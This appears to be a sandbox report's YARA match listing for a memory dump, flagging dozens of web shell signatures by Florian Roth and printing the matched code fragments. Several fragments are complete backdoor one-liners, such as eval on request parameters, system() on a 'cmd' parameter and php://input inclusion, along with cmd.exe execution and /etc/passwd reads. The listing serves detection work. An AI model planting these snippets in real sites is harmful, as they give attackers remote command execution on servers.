- 0x1c129:$s1: @preg_replace('/ad/e','@'.str_rot13('riny').'($ww
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_PHP_redcod | Web Shell - file redcod.php | Florian Roth | - 0x1c223:$s0: H8p0bGFOEy7eAly4h4E4o88LTSVHoAglJ2KLQhUw
- 0x1c250:$s1: HKP7dVyCf8cgnWFy8ocjrP5ffzkn9ODroM0/raHm
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_remview_fix | Web Shell - file remview_fix.php | Florian Roth | - 0x1be63:$s4: <a href='$self?c=delete&c2=$c2&confirm=delete&d=".urlencode($d)."&f=".u
- 0x1c347:$s4: <a href='$self?c=delete&c2=$c2&confirm=delete&d=".urlencode($d)."&f=".u
- 0x1c393:$s5: echo "<P><hr size=1 noshade>\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_asp_cmd | Web Shell - file cmd.asp | Florian Roth | - 0x1c490:$s0: <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
- 0x20c09:$s0: <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
- 0x248fd:$s0: <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
- 0x425d1:$s0: <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
- 0x4c448:$s0: <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
- 0x1c4d6:$s1: Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
- 0x33cf1:$s1: Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
- 0x1c51b:$s3: Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
- 0x24943:$s3: Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
- 0x42548:$s3: Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
- 0x4aa86:$s3: Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
- 0x4c48e:$s3: Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_php_sh_server | Web Shell - file server.php | Florian Roth | - 0x1c62d:$s0: eval(getenv('HTTP_CODE'));
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_PH_Vayv_PH_Vayv | Web Shell - file PH Vayv.php | Florian Roth | - 0x1c716:$s0: style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px in
- 0x1c75a:$s4: <font color="#858585">SHOPEN</font></a></font><font face="Verdana" style
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_caidao_shell_ice | Web Shell - file ice.asp | Florian Roth | - 0x1c86e:$s0: <%eval request("ice")%>
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_cihshell_fix | Web Shell - file cihshell_fix.php | Florian Roth | - 0x1c956:$s7: <tr style='background:#242424;' ><td style='padding:10px;'><form action='' encty
- 0x1c9ab:$s8: if (isset($_POST['mysqlw_host'])){$dbhost = $_POST['mysqlw_host'];} else {$dbhos
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_asp_shell | Web Shell - file shell.asp | Florian Roth | - 0x1cac2:$s7: <input type="submit" name="Send" value="GO!">
- 0x1caf4:$s8: <TEXTAREA NAME="1988" ROWS="18" COLS="78"></TEXTAREA>
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_Private_i3lue | Web Shell - file Private-i3lue.php | Florian Roth | - 0x1cbfc:$s8: case 15: $image .= "\21\0\
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_php_up | Web Shell - file up.php | Florian Roth | - 0x1ccd7:$s0: copy($HTTP_POST_FILES['userfile']['tmp_name'], $_POST['remotefile']);
- 0x1cd21:$s3: if(is_uploaded_file($HTTP_POST_FILES['userfile']['tmp_name'])) {
- 0x1cd66:$s8: echo "Uploaded file: " . $HTTP_POST_FILES['userfile']['name'];
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_Mysql_interface_v1_0 | Web Shell - file Mysql interface v1.0.php | Florian Roth | - 0x1ce85:$s0: echo "<td><a href='$PHP_SELF?action=dropDB&dbname=$dbname' onClick=\"return
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_php_s_u | Web Shell - file s-u.php | Florian Roth | - 0x1cf93:$s6: <a href="?act=do"><font color="red">Go Execute</font></a></b><br /><textarea
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_phpshell_2_1_config | Web Shell - file config.php | Florian Roth | - 0x1d0b1:$s1: ; (choose good passwords!). Add uses as simple 'username = "password"' lines.
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_asp_EFSO_2 | Web Shell - file EFSO_2.asp | Florian Roth | - 0x1d1c8:$s0: %8@#@&P~,P,PP,MV~4BP^~,NS~m~PXc3,_PWbSPU W~~[u3Fffs~/%@#@&~~,PP~~,M!PmS,4S,mBPNB
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_jsp_up | Web Shell - file up.jsp | Florian Roth | - 0x1d2d9:$s9: // BUG: Corta el fichero si es mayor de 640Ks
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_NetworkFileManagerPHP | Web Shell - file NetworkFileManagerPHP.php | Florian Roth | - 0x1d3e9:$s9: echo "<br><center>All the data in these tables:<br> ".$tblsv." were putted
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_Server_Variables | Web Shell - file Server Variables.asp | Florian Roth | - 0x1d50f:$s7: <% For Each Vars In Request.ServerVariables %>
- 0x1d542:$s9: Variable Name</B></font></p>
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_caidao_shell_ice_2 | Web Shell - file ice.php | Florian Roth | - 0x1d62c:$s0: <?php ${${eval($_POST[ice])}};?>
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_caidao_shell_mdb | Web Shell - file mdb.asp | Florian Roth | - 0x1d718:$s1: <% execute request("ice")%>a
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_jsp_guige | Web Shell - file guige.jsp | Florian Roth | - 0x1d7fc:$s0: if(damapath!=null &&!damapath.equals("")&&content!=null
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_phpspy2010 | Web Shell - file phpspy2010.php | Florian Roth | - 0x1d900:$s3: eval(gzinflate(base64_decode(
- 0x240f3:$s3: eval(gzinflate(base64_decode(
- 0x24f45:$s3: eval(gzinflate(base64_decode(
- 0x312d2:$s3: eval(gzinflate(base64_decode(
- 0x3268d:$s3: eval(gzinflate(base64_decode(
- 0x3e9ff:$s3: eval(gzinflate(base64_decode(
- 0x40bb1:$s3: eval(gzinflate(base64_decode(
- 0x42319:$s3: eval(gzinflate(base64_decode(
- 0x1d922:$s5: //angel
- 0x1d92e:$s8: $admin['cookiedomain'] = '';
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_asp_ice | Web Shell - file ice.asp | Florian Roth | - 0x1da0d:$s0: D,'PrjknD,J~[,EdnMP[,-4;DS6@#@&VKobx2ldd,'~JhC
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_drag_system | Web Shell - file system.jsp | Florian Roth | - 0x1db05:$s9: String sql = "SELECT * FROM DBA_TABLES WHERE TABLE_NAME not like '%$%' and num_
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_DarkBlade1_3_asp_indexx | Web Shell - file indexx.asp | Florian Roth | - 0x1dc2a:$s3: Const strs_toTransform="command|Radmin|NTAuThenabled|FilterIp|IISSample|PageCou
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_phpshell3 | Web Shell - file phpshell3.php | Florian Roth | - 0x1dd44:$s2: <input name="nounce" type="hidden" value="<?php echo $_SESSION['nounce'];
- 0x1dd92:$s5: <p>Username: <input name="username" type="text" value="<?php echo $userna
- 0x1dde0:$s7: $_SESSION['output'] .= "cd: could not change to: $new_dir\n";
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_jsp_hsxa | Web Shell - file hsxa.jsp | Florian Roth | - 0x1dee2:$s0: <%@ page language="java" pageEncoding="gbk"%><jsp:directive.page import="ja
- 0x23b25:$s0: <%@ page language="java" pageEncoding="gbk"%><jsp:directive.page import="ja
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_jsp_utils | Web Shell - file utils.jsp | Florian Roth | - 0x1dff4:$s0: ResultSet r = c.getMetaData().getTables(null, null, "%", t);
- 0x1e035:$s4: String cs = request.getParameter("z0")==null?"gbk": request.getParameter("z
- 0x2303a:$s4: String cs = request.getParameter("z0")==null?"gbk": request.getParameter("z
- 0x251ee:$s4: String cs = request.getParameter("z0")==null?"gbk": request.getParameter("z
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_asp_01 | Web Shell - file 01.asp | Florian Roth | - 0x1e141:$s0: <%eval request("pass")%>
- 0x1fdf0:$s0: <%eval request("pass")%>
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_asp_404 | Web Shell - file 404.asp | Florian Roth | - 0x1e21c:$s0: lFyw6pd^DKV^4CDRWmmnO1GVKDl:y& f+2
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_webshell_cnseay02_1 | Web Shell - file webshell-cnseay02-1.php | Florian Roth | - 0x1e31d:$s0: (93).$_uU(41).$_uU(59);$_fF=$_uU(99).$_uU(114).$_uU(101).$_uU(97).$_uU(116).$_uU
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_php_fbi | Web Shell - file fbi.php | Florian Roth | - 0x1e430:$s7: erde types','Getallen','Datum en tijd','Tekst','Binaire gegevens','Netwerk','Geo
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_B374kPHP_B374k | Web Shell - file B374k.php | Florian Roth | - 0x1e54c:$s0: Http://code.google.com/p/b374k-shell
- 0x1e575:$s1: $_=str_rot13('tm'.'vas'.'yngr');$_=str_rot13(strrev('rqb'.'prq'.'_'.'46r'.'fno'
- 0x1e5c9:$s3: Jayalah Indonesiaku & Lyke @ 2013
- 0x1e5ef:$s4: B374k Vip In Beautify Just For Self
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_cmd_asp_5_1 | Web Shell - file cmd-asp-5.1.asp | Florian Roth | - 0x1e6e1:$s9: Call oS.Run("win.com cmd.exe /c """ & szCMD & " > " & szTF &
- 0x3655b:$s9: Call oS.Run("win.com cmd.exe /c """ & szCMD & " > " & szTF &
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_php_dodo_zip | Web Shell - file zip.php | Florian Roth | - 0x1e7e5:$s0: $hexdtime = '\x' . $dtime[6] . $dtime[7] . '\x' . $dtime[4] . $dtime[5] . '\x
- 0x1e837:$s3: $datastr = "\x50\x4b\x03\x04\x0a
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_aZRaiLPhp_v1_0 | Web Shell - file aZRaiLPhp v1.0.php | Florian Roth | - 0x1e94c:$s5: echo " <font color='#0000FF'>CHMODU ".substr(base_convert(@fileperms($
- 0x1e997:$s7: echo "<a href='./$this_file?op=efp&fname=$path/$file&dismi=$file&yol=$path'><fo
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_php_list | Web Shell - file list.php | Florian Roth | - 0x1eaab:$s1: // list.php = Directory & File Listing
- 0x1ead6:$s2: echo "( ) <a href=?file=" . $fichero . "/" . $filename . ">" . $filena
- 0x1eb25:$s9: // by: The Dark Raver
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_ironshell | Web Shell - file ironshell.php | Florian Roth | - 0x1ec05:$s4: print "<form action=\"".$me."?p=cmd&dir=".realpath('.')."
- 0x1ec43:$s8: print "<td id=f><a href=\"?p=rename&file=".realpath($file)."&di
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_caidao_shell_404 | Web Shell - file 404.php | Florian Roth | - 0x1ed4e:$s0: <?php $K=sTr_RepLaCe('`','','a`s`s`e`r`t');$M=$_POST[ice];IF($M==NuLl)HeaDeR('St
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_ASP_aspydrv | Web Shell - file aspydrv.asp | Florian Roth | - 0x1ee69:$s3: <%=thingy.DriveLetter%> </td><td><tt> <%=thingy.DriveType%> </td><td><tt> <%=thi
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_jsp_web | Web Shell - file web.jsp | Florian Roth | - 0x1ef7c:$s0: <%@page import="java.io.*"%><%@page import="java.net.*"%><%String t=request.
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_mysqlwebsh | Web Shell - file mysqlwebsh.php | Florian Roth | - 0x1f095:$s3: <TR><TD bgcolor="<? echo (!$CONNECT && $action == "chparam")?"#660000":"#
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_jspShell | Web Shell - file jspShell.jsp | Florian Roth | - 0x1f1a8:$s0: <input type="checkbox" name="autoUpdate" value="AutoUpdate" on
- 0x1f1eb:$s1: onblur="document.shell.autoUpdate.checked= this.oldValue;
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_Dx_Dx | Web Shell - file Dx.php | Florian Roth | - 0x1f2e4:$s1: print "\n".'Tip: to view the file "as is" - open the page in <a href="'.Dx
- 0x32e5d:$s1: print "\n".'Tip: to view the file "as is" - open the page in <a href="'.Dx
- 0x356b0:$s1: print "\n".'Tip: to view the file "as is" - open the page in <a href="'.Dx
- 0x1f333:$s9: class=linelisting><nobr>POST (php eval)</td><
- 0x3571f:$s9: class=linelisting><nobr>POST (php eval)</td><
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_asp_ntdaddy | Web Shell - file ntdaddy.asp | Florian Roth | - 0x1f42b:$s9: if FP = "RefreshFolder" or
- 0x1f451:$s10: request.form("cmdOption")="DeleteFolder"
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_MySQL_Web_Interface_Version_0_8 | Web Shell - file MySQL Web Interface Version 0.8.php | Florian Roth | - 0x1f572:$s2: href='$PHP_SELF?action=dumpTable&dbname=$dbname&tablename=$tablename'>Dump</a>
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_elmaliseker_2 | Web Shell - file elmaliseker.asp | Florian Roth | - 0x1f691:$s1: <td<%if (FSO.GetExtensionName(path & "\" & oFile.Name)="lnk") or (FSO.GetEx
- 0x1f6e1:$s6: <input type=button value=Save onclick="EditorCommand('Save')"> <input type=but
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_ASP_RemExp | Web Shell - file RemExp.asp | Florian Roth | - 0x1f7f8:$s0: <td bgcolor="<%=BgColor%>" title="<%=SubFolder.Name%>"> <a href= "<%=Reques
- 0x4d9e5:$s0: <td bgcolor="<%=BgColor%>" title="<%=SubFolder.Name%>"> <a href= "<%=Reques
- 0x1f848:$s1: Private Function ConvertBinary(ByVal SourceNumber, ByVal MaxValuePerIndex, ByVal
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_jsp_list1 | Web Shell - file list1.jsp | Florian Roth | - 0x1f95f:$s1: case 's':ConnectionDBM(out,encodeChange(request.getParameter("drive
- 0x1f9a7:$s9: return "<a href=\"javascript:delFile('"+folderReplace(file)+"')\"
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_phpkit_1_0_odd | Web Shell - file odd.php | Florian Roth | - 0x1fab2:$s0: include('php://input');
- 0x20a85:$s0: include('php://input');
- 0x1face:$s1: // No eval() calls, no system() calls, nothing normally seen as malicious.
- 0x1fb1d:$s2: ini_set('allow_url_include, 1'); // Allow url inclusion in this script
- 0x20aa1:$s2: ini_set('allow_url_include, 1'); // Allow url inclusion in this script
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_jsp_123 | Web Shell - file 123.jsp | Florian Roth | - 0x1fc26:$s0: <font color="blue">??????????????????:</font><input type="text" size="7
- 0x1bff3:$s3: String path=new String(request.getParameter("path").getBytes("ISO-8859-1"
- 0x1fc72:$s3: String path=new String(request.getParameter("path").getBytes("ISO-8859-1"
- 0x232b1:$s3: String path=new String(request.getParameter("path").getBytes("ISO-8859-1"
- 0x1fcc0:$s9: <input type="submit" name="btnSubmit" value="Upload">
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_asp_1 | Web Shell - file 1.asp | Florian Roth | - 0x1fdb8:$s4: !22222222222222222222222222222222222222222222222222
- 0x1e141:$s8: <%eval request("pass")%>
- 0x1fdf0:$s8: <%eval request("pass")%>
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_ASP_tool | Web Shell - file tool.asp | Florian Roth | - 0x1fecd:$s0: Response.Write "<FORM action=""" & Request.ServerVariables("URL") & """
- 0x1ff19:$s3: Response.Write "<tr><td><font face='arial' size='2'><b><DIR> <a href='"
- 0x1ff6c:$s9: Response.Write "<font face='arial' size='1'><a href=""#"" onclick=""javas
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_cmd_win32 | Web Shell - file cmd_win32.jsp | Florian Roth | - 0x20080:$s0: Process p = Runtime.getRuntime().exec("cmd.exe /c " + request.getParam
- 0x200cb:$s1: <FORM METHOD="POST" NAME="myform" ACTION="">
- 0x22d39:$s1: <FORM METHOD="POST" NAME="myform" ACTION="">
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_jsp_jshell | Web Shell - file jshell.jsp | Florian Roth | - 0x201c0:$s0: kXpeW["
- 0x201cc:$s4: [7b:g0W@W<
- 0x201db:$s5: b:gHr,g<
- 0x201e8:$s8: RhV0W@W<
- 0x201f5:$s9: S_MR(u7b
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_ASP_zehir4 | Web Shell - file zehir4.asp | Florian Roth | - 0x202c6:$s9: Response.Write "<a href='"&dosyaPath&"?status=7&Path="&Path&"/
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_wsb_idc | Web Shell - file idc.php | Florian Roth | - 0x203c7:$s1: if (md5($_GET['usr'])==$user && md5($_GET['pass'])==$pass)
- 0x20406:$s3: {eval($_GET['idc']);}
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_cpg_143_incl_xpl | Web Shell - file cpg_143_incl_xpl.php | Florian Roth | - 0x204f4:$s3: $data="username=".urlencode($USER)."&password=".urlencode($PA
- 0x20536:$s5: fputs($sun_tzu,"<?php echo \"Hi Master!\";ini_set(\"max_execution_time
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_mumaasp_com | Web Shell - file mumaasp.com.asp | Florian Roth | - 0x2064b:$s0: &9K_)P82ai,A}I92]R"q!C:RZ}S6]=PaTTR
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_php_404 | Web Shell - file 404.php | Florian Roth | - 0x20731:$s0: $pass = md5(md5(md5($pass)));
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_webshell_cnseay_x | Web Shell - file webshell-cnseay-x.php | Florian Roth | - 0x20829:$s9: $_F_F.='_'.$_P_P[5].$_P_P[20].$_P_P[13].$_P_P[2].$_P_P[19].$_P_P[8].$_P_
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_asp_up | Web Shell - file up.asp | Florian Roth | - 0x20932:$s0: Pos = InstrB(BoundaryPos,RequestBin,getByteString("Content-Dispositio
- 0x2097c:$s1: ContentType = getString(MidB(RequestBin,PosBeg,PosEnd-PosBeg))
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_phpkit_0_1a_odd | Web Shell - file odd.php | Florian Roth | - 0x1fab2:$s1: include('php://input');
- 0x20a85:$s1: include('php://input');
- 0x1fb1d:$s3: ini_set('allow_url_include, 1'); // Allow url inclusion in this script
- 0x20aa1:$s3: ini_set('allow_url_include, 1'); // Allow url inclusion in this script
- 0x20aec:$s4: // uses include('php://input') to execute arbritary code
- 0x20b29:$s5: // php://input based backdoor
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_ASP_cmd | Web Shell - file cmd.asp | Florian Roth | - 0x1c490:$s0: <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
- 0x20c09:$s0: <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
- 0x248fd:$s0: <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
- 0x425d1:$s0: <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
- 0x4c448:$s0: <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_PHP_Shell_x3 | Web Shell - file PHP Shell.php | Florian Roth | - 0x20d18:$s4: <?php echo buildUrl("<font color=\"navy\">[
- 0x2280b:$s4: <?php echo buildUrl("<font color=\"navy\">[
- 0x20d54:$s6: echo "</form><form action=\"$SFileName?$urlAdd\" method=\"post\"><input
- 0x367c7:$s6: echo "</form><form action=\"$SFileName?$urlAdd\" method=\"post\"><input
- 0x20da0:$s9: if ( ( (isset($http_auth_user) ) && (isset($http_auth_pass)) ) && ( !isset(
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_PHP_g00nv13 | Web Shell - file g00nv13.php | Florian Roth | - 0x20eb7:$s1: case "zip": case "tar": case "rar": case "gz": case "cab": cas
- 0x20efa:$s4: if(!($sqlcon = @mysql_connect($_SESSION['sql_host'] . ':' . $_SESSION['sql_p
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_php_h6ss | Web Shell - file h6ss.php | Florian Roth | - 0x2100b:$s0: <?php eval(gzuncompress(base64_decode("
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_jsp_zx | Web Shell - file zx.jsp | Florian Roth | - 0x210f3:$s0: if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.g
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_Ani_Shell | Web Shell - file Ani-Shell.php | Florian Roth | - 0x2120c:$s0: $Python_CODE = "I
- 0x21222:$s6: $passwordPrompt = "\n=================================================
- 0x2126d:$s7: fputs ($sockfd ,"\n===============================================
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_jsp_k8cmd | Web Shell - file k8cmd.jsp | Florian Roth | - 0x21376:$s2: if(request.getSession().getAttribute("hehe").toString().equals("hehe"))
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_jsp_cmd | Web Shell - file cmd.jsp | Florian Roth | - 0x21480:$s6: out.println("Command: " + request.getParameter("cmd") + "<BR>");
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_jsp_k81 | Web Shell - file k81.jsp | Florian Roth | - 0x21583:$s1: byte[] binary = BASE64Decoder.class.newInstance().decodeBuffer(cmd);
- 0x215cc:$s9: if(cmd.equals("Szh0ZWFt")){out.print("[S]"+dir+"[E]");}
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_ASP_zehir | Web Shell - file zehir.asp | Florian Roth | - 0x216ca:$s9: Response.Write "<font face=wingdings size=3><a href='"&dosyaPath&"?status=18&
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_Worse_Linux_Shell | Web Shell - file Worse Linux Shell.php | Florian Roth | - 0x217f2:$s0: system("mv ".$_FILES['_upl']['tmp_name']." ".$currentWD
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_zacosmall | Web Shell - file zacosmall.php | Florian Roth | - 0x218f4:$s0: if($cmd!==''){ echo('<strong>'.htmlspecialchars($cmd)."</strong><hr>
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_Liz0ziM_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit | Web Shell - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php | Florian Roth | - 0x21a67:$s1: <option value="cat /etc/passwd">/etc/passwd</option>
- 0x3fc7a:$s1: <option value="cat /etc/passwd">/etc/passwd</option>
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_redirect | Web Shell - file redirect.asp | Florian Roth | - 0x21b64:$s7: var flag = "?txt=" + (document.getElementById("dl").checked ? "2":"1"
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_jsp_cmdjsp | Web Shell - file cmdjsp.jsp | Florian Roth | - 0x21c73:$s5: <FORM METHOD=GET ACTION='cmdjsp.jsp'>
- 0x2421c:$s5: <FORM METHOD=GET ACTION='cmdjsp.jsp'>
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_Java_Shell | Web Shell - file Java Shell.jsp | Florian Roth | - 0x21d65:$s4: public JythonShell(int columns, int rows, int scrollback) {
- 0x21da5:$s9: this(null, Py.getSystemState(), columns, rows, scrollback);
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_asp_1d | Web Shell - file 1d.asp | Florian Roth | - 0x21ea1:$s0: +9JkskOfKhUxZJPL~\(mD^W~[,{@#@&EO
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_jsp_IXRbE | Web Shell - file IXRbE.jsp | Florian Roth | - 0x21f89:$s0: <%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application
- 0x258ff:$s0: <%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_PHP_G5 | Web Shell - file G5.php | Florian Roth | - 0x22098:$s3: echo "Hacking Mode?<br><select name='htype'><option >--------SELECT--------</op
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_PHP_r57142 | Web Shell - file r57142.php | Florian Roth | - 0x221b0:$s0: $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_jsp_tree | Web Shell - file tree.jsp | Florian Roth | - 0x222c3:$s5: $('#tt2').tree('options').url = "selectChild.action?checki
- 0x22302:$s6: String basePath = request.getScheme()+"://"+request.getServerName()+":"+requ
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_C99madShell_v_3_0_smowu | Web Shell - file smowu.php | Florian Roth | - 0x22423:$s2: <tr><td width="50%" height="1" valign="top"><center><b>:: Enter ::</b><for
- 0x22472:$s8: <p><font color=red>Wordpress Not Found! <input type=text id="wp_pat"><input ty
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_simple_backdoor | Web Shell - file simple-backdoor.php | Florian Roth | - 0x22597:$s0: $cmd = ($_REQUEST['cmd']);
- 0x33e38:$s0: $cmd = ($_REQUEST['cmd']);
- 0x4191e:$s0: $cmd = ($_REQUEST['cmd']);
- 0x225b6:$s1: if(isset($_REQUEST['cmd'])){
- 0x41957:$s1: if(isset($_REQUEST['cmd'])){
- 0x42022:$s1: if(isset($_REQUEST['cmd'])){
- 0x225d7:$s4: system($cmd);
- 0x41991:$s4: system($cmd);
- 0x42043:$s4: system($cmd);
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_PHP_404 | Web Shell - file 404.php | Florian Roth | - 0x226a7:$s4: <span>Posix_getpwuid ("Read" /etc/passwd)
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_Macker_s_Private_PHPShell | Web Shell - file Macker\'s Private PHPShell.php | Florian Roth | - 0x227bb:$s3: echo "<tr><td class=\"silver border\"> <strong>Server's PHP Version:&n
- 0x20d18:$s4: <?php echo buildUrl("<font color=\"navy\">[
- 0x2280b:$s4: <?php echo buildUrl("<font color=\"navy\">[
- 0x22847:$s7: echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=
- 0x36813:$s7: echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_Antichat_Shell_v1_3_2 | Web Shell - file Antichat Shell v1.3.php | Florian Roth | - 0x2296e:$s3: $header='<html><head><title>'.getenv("HTTP_HOST").' - Antichat Shell</title><m
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_Safe_mode_breaker | Web Shell - file Safe mode breaker.php | Florian Roth | - 0x22a97:$s5: preg_match("/SAFE\ MODE\ Restriction\ in\ effect\..*whose\ uid\ is(
- 0x22adf:$s6: $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL).
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_Sst_Sheller | Web Shell - file Sst-Sheller.php | Florian Roth | - 0x22be6:$s2: echo "<a href='?page=filemanager&id=fm&fchmod=$dir$file'>
- 0x22c24:$s3: <? unlink($filename); unlink($filename1); unlink($filename2); unlink($filename3)
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_jsp_list | Web Shell - file list.jsp | Florian Roth | - 0x200cb:$s0: <FORM METHOD="POST" NAME="myform" ACTION="">
- 0x22d39:$s0: <FORM METHOD="POST" NAME="myform" ACTION="">
